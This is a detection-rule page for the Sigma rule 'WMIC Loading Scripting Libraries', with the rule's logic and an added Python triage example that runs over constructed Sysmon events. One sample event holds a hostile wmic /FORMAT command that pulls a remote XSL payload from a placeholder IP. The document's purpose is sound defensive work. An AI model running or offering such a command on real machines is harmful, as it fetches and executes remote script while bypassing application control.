Since the image load event does not carry enough information in this case, it is better to look at the recent process creation events that spawned the wmic process and investigate the command line and the parent/child processes to get more insight.

Techniques

Sample rules

WMIC Loading Scripting Libraries

Description

Detects threat actors proxy-executing code and bypassing application control by leveraging wmic with the /FORMAT switch to download and execute an XSL file that carries embedded script (e.g. JScript or VBScript), which causes wmic.exe to load the corresponding scripting engine DLL.

Detection logic

selection:
  Image|endswith: '\wmic.exe'
  ImageLoaded|endswith:
    - '\jscript.dll'
    - '\vbscript.dll'
condition: selection
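The following is an added example, not code from the LoFP page or the Sigma project. It evaluates the rule's selection over constructed Sysmon-style records and then pivots each hit to the process creation event of the same process, which is the triage step the false-positive note above recommends: the image load alone shows only that wmic.exe loaded a scripting DLL, while the process creation event supplies the command line and parent. Field names follow Sysmon (EventID 7 = image load, EventID 1 = process creation), the sample events are constructed, and the `format_switch` flag is a heuristic of this example, not part of the rule.

```python
"""Run the 'WMIC Loading Scripting Libraries' selection over constructed
Sysmon-style events and enrich each hit with its process-creation event.
Added example; the sample telemetry below is constructed, not real logs."""

# Selection from the rule. Sigma string matching is case-insensitive by
# default, so both sides are lowered before comparison.
RULE_IMAGE_SUFFIX = r"\wmic.exe"
RULE_LOADED_SUFFIXES = (r"\jscript.dll", r"\vbscript.dll")

WMIC = r"C:\Windows\System32\wbem\WMIC.exe"

# Constructed sample telemetry (assumption of this example, not real logs).
EVENTS = [
    # Process A: wmic pulls a remote XSL stylesheet via /FORMAT, then loads jscript.dll.
    {"EventID": 1, "ProcessGuid": "{A}", "Image": WMIC,
     "CommandLine": 'wmic os get /FORMAT:"http://198.51.100.7/payload.xsl"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 7, "ProcessGuid": "{A}", "Image": WMIC,
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    # Process B: benign inventory query; loads only WMI libraries.
    {"EventID": 1, "ProcessGuid": "{B}", "Image": WMIC,
     "CommandLine": "wmic computersystem get domain",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 7, "ProcessGuid": "{B}", "Image": WMIC,
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    # Process C: cscript loading jscript.dll; not wmic, so out of scope for this rule.
    {"EventID": 7, "ProcessGuid": "{C}", "Image": r"C:\Windows\System32\cscript.exe",
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    # Process D: a hit whose process-creation event was not retained, the case
    # the false-positive note warns about: the image load alone is not enough.
    {"EventID": 7, "ProcessGuid": "{D}", "Image": WMIC,
     "ImageLoaded": r"C:\Windows\SysWOW64\vbscript.dll"},
]


def matches_selection(event):
    """Return True when an image-load event satisfies the rule's selection."""
    if event.get("EventID") != 7:
        return False
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    return image.endswith(RULE_IMAGE_SUFFIX) and loaded.endswith(RULE_LOADED_SUFFIXES)


def find_hits(events):
    """All image-load events that match the rule."""
    return [e for e in events if matches_selection(e)]


def process_creation_for(guid, events):
    """Return the process-creation event for guid, or None if it was not logged."""
    for e in events:
        if e.get("EventID") == 1 and e.get("ProcessGuid") == guid:
            return e
    return None


def triage(events):
    """For each hit, attach the command line and parent from the matching
    process-creation event. 'format_switch' is a heuristic flag (assumption of
    this example, not part of the rule) marking command lines that use /FORMAT,
    the switch the description says is abused to pull an XSL file."""
    results = []
    for hit in find_hits(events):
        proc = process_creation_for(hit["ProcessGuid"], events)
        cmdline = proc.get("CommandLine") if proc else None
        results.append({
            "ProcessGuid": hit["ProcessGuid"],
            "ImageLoaded": hit["ImageLoaded"],
            "CommandLine": cmdline,
            "ParentImage": proc.get("ParentImage") if proc else None,
            "format_switch": bool(cmdline) and "/format" in cmdline.lower(),
            "needs_process_creation": proc is None,
        })
    return results


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```

Process B shows why the rule keys on the scripting DLLs rather than on wmic.exe alone: an ordinary inventory query loads only WMI libraries. Process D shows the gap the false-positive note describes; a hit with `needs_process_creation` set cannot be judged from the image load event and has to be pivoted to process creation telemetry, or to the parent/child process tree, before it is closed.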